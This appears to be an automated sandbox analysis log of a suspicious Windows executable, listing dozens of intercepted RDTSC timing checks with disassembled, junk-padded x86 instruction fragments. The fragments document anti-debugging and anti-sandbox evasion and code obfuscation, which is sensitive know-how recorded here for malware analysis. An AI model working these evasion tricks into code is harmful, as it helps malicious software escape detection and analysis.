Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 107C43B second address: 107C43F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 107C8B1 second address: 107C8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 107B95E second address: 107B962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 107CA69 second address: 107CA73 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1DED527546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 107DCA6 second address: 107DCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007F1DECBA0FD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 107DCB4 second address: 107DCE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DED52754Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1DED527556h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1080DFB second address: 1080E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1080E06 second address: 1080E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1081651 second address: 1081669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F1DECBA0FE3h 0x0000000b jmp 00007F1DECBA0FDDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1081669 second address: 108166E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108166E second address: 1081674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108548D second address: 10854B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1DED527557h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F1DED527548h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1085A12 second address: 1085A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jnl 00007F1DECBA0FD6h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1085BF2 second address: 1085BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1085BF8 second address: 1085BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1085EC6 second address: 1085EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1DED527552h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1085EE1 second address: 1085EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1085F92 second address: 1085FDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED52754Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007F1DED52754Ch 0x00000012 jmp 00007F1DED52754Dh 0x00000017 popad 0x00000018 nop 0x00000019 mov di, bx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F1DED527554h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1085FDC second address: 1085FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F1DECBA0FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1086510 second address: 1086515 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1086515 second address: 1086594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F1DECBA0FD8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D337Ah] 0x00000028 mov esi, 3C3D6E1Ah 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+122D247Ah], edi 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D26CBh], edi 0x0000003d xchg eax, ebx 0x0000003e ja 00007F1DECBA0FF1h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F1DECBA0FE5h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1086FAB second address: 1086FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1086FB1 second address: 1086FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1086FB7 second address: 1087029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b jmp 00007F1DED52754Eh 0x00000010 pop eax 0x00000011 jns 00007F1DED527548h 0x00000017 popad 0x00000018 nop 0x00000019 jmp 00007F1DED527555h 0x0000001e and edi, dword ptr [ebp+122D1B97h] 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F1DED527548h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov esi, 3A5A6A5Ch 0x00000047 xchg eax, ebx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1087029 second address: 108702D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108702D second address: 1087043 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jp 00007F1DED527546h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1087043 second address: 108704D instructions: 0x00000000 rdtsc 0x00000002 js 00007F1DECBA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10880DB second address: 1088140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, 7C582ED7h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F1DED527548h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 xor si, 2352h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F1DED527548h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D3596h] 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push edx 0x00000056 pop edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10878CE second address: 10878D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1088140 second address: 1088146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1088146 second address: 108815F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DECBA0FE5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108815F second address: 1088193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1DED527556h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1088B7A second address: 1088B7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1088B7F second address: 1088C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F1DED527548h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D1B01h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F1DED527548h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push esi 0x0000004b call 00007F1DED527548h 0x00000050 pop esi 0x00000051 mov dword ptr [esp+04h], esi 0x00000055 add dword ptr [esp+04h], 0000001Ch 0x0000005d inc esi 0x0000005e push esi 0x0000005f ret 0x00000060 pop esi 0x00000061 ret 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F1DED527556h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10896E0 second address: 108975F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1DECBA0FD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1DECBA0FE4h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F1DECBA0FD8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F1DECBA0FD8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov esi, dword ptr [ebp+122D3662h] 0x0000004d push 00000000h 0x0000004f mov edi, ebx 0x00000051 mov esi, edx 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108A042 second address: 108A048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108A048 second address: 108A096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F1DECBA0FD6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F1DECBA0FD8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, esi 0x0000002d mov edi, 1E282B35h 0x00000032 pushad 0x00000033 stc 0x00000034 mov di, C533h 0x00000038 popad 0x00000039 push 00000000h 0x0000003b movsx edi, bx 0x0000003e push 00000000h 0x00000040 mov di, 8DE1h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108A096 second address: 108A09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108AB9C second address: 108ABA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108ABA0 second address: 108ABA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108D063 second address: 108D069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 108D069 second address: 108D0BA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1DED527548h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F1DED52754Ah 0x00000013 jmp 00007F1DED52754Eh 0x00000018 jnp 00007F1DED527546h 0x0000001e popad 0x0000001f push edx 0x00000020 jmp 00007F1DED527558h 0x00000025 pop edx 0x00000026 je 00007F1DED52754Eh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10903E2 second address: 10903E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10903E7 second address: 10903FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED52754Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1090941 second address: 1090950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1090950 second address: 10909D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED52754Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F1DED527548h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov ebx, esi 0x00000026 jmp 00007F1DED527552h 0x0000002b push 00000000h 0x0000002d jo 00007F1DED527551h 0x00000033 jmp 00007F1DED52754Bh 0x00000038 push 00000000h 0x0000003a mov di, bx 0x0000003d mov dword ptr [ebp+122D18C5h], edi 0x00000043 push eax 0x00000044 pushad 0x00000045 jnl 00007F1DED52755Dh 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1090B22 second address: 1090B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1090B26 second address: 1090B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1DED527550h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1090B3E second address: 1090B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1090B42 second address: 1090BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 xor dword ptr [ebp+122D1A56h], edi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F1DED527548h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f xor dword ptr [ebp+122D2FBFh], edx 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c call 00007F1DED527550h 0x00000041 movzx edi, di 0x00000044 pop ebx 0x00000045 mov eax, dword ptr [ebp+122D0F81h] 0x0000004b push eax 0x0000004c xor dword ptr [ebp+122D26BDh], edx 0x00000052 pop ebx 0x00000053 push FFFFFFFFh 0x00000055 jng 00007F1DED527553h 0x0000005b nop 0x0000005c pushad 0x0000005d je 00007F1DED527548h 0x00000063 push esi 0x00000064 pop esi 0x00000065 push eax 0x00000066 push edx 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1090BC5 second address: 1090BE4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1DECBA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1DECBA0FE0h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1091BA3 second address: 1091BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1091BA9 second address: 1091BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1094711 second address: 1094715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1092933 second address: 109293D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1DECBA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109293D second address: 1092943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1094D0A second address: 1094D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1097FA6 second address: 1098061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F1DED52755Ch 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D33EAh] 0x00000015 call 00007F1DED52754Bh 0x0000001a mov dword ptr [ebp+122D1A5Dh], esi 0x00000020 pop ebx 0x00000021 push dword ptr fs:[00000000h] 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F1DED527548h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 mov di, EF01h 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d adc bx, BBFCh 0x00000052 mov eax, dword ptr [ebp+122D14FDh] 0x00000058 sub bh, 0000005Ah 0x0000005b push FFFFFFFFh 0x0000005d push 00000000h 0x0000005f push edi 0x00000060 call 00007F1DED527548h 0x00000065 pop edi 0x00000066 mov dword ptr [esp+04h], edi 0x0000006a add dword ptr [esp+04h], 0000001Ch 0x00000072 inc edi 0x00000073 push edi 0x00000074 ret 0x00000075 pop edi 0x00000076 ret 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a push edi 0x0000007b jmp 00007F1DED527550h 0x00000080 pop edi 0x00000081 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1098061 second address: 1098083 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109AE36 second address: 109AE4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109AFB3 second address: 109AFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109E4A5 second address: 109E509 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F1DED527548h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F1DED527548h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 0000001Bh 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e xor dword ptr [ebp+122D2AEDh], esi 0x00000044 cld 0x00000045 push 00000000h 0x00000047 movzx edi, di 0x0000004a mov edi, dword ptr [ebp+122D1A83h] 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109D5B4 second address: 109D5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109D5B8 second address: 109D5BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109D5BC second address: 109D5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F1DECBA0FD8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109F496 second address: 109F49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109F49A second address: 109F49E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
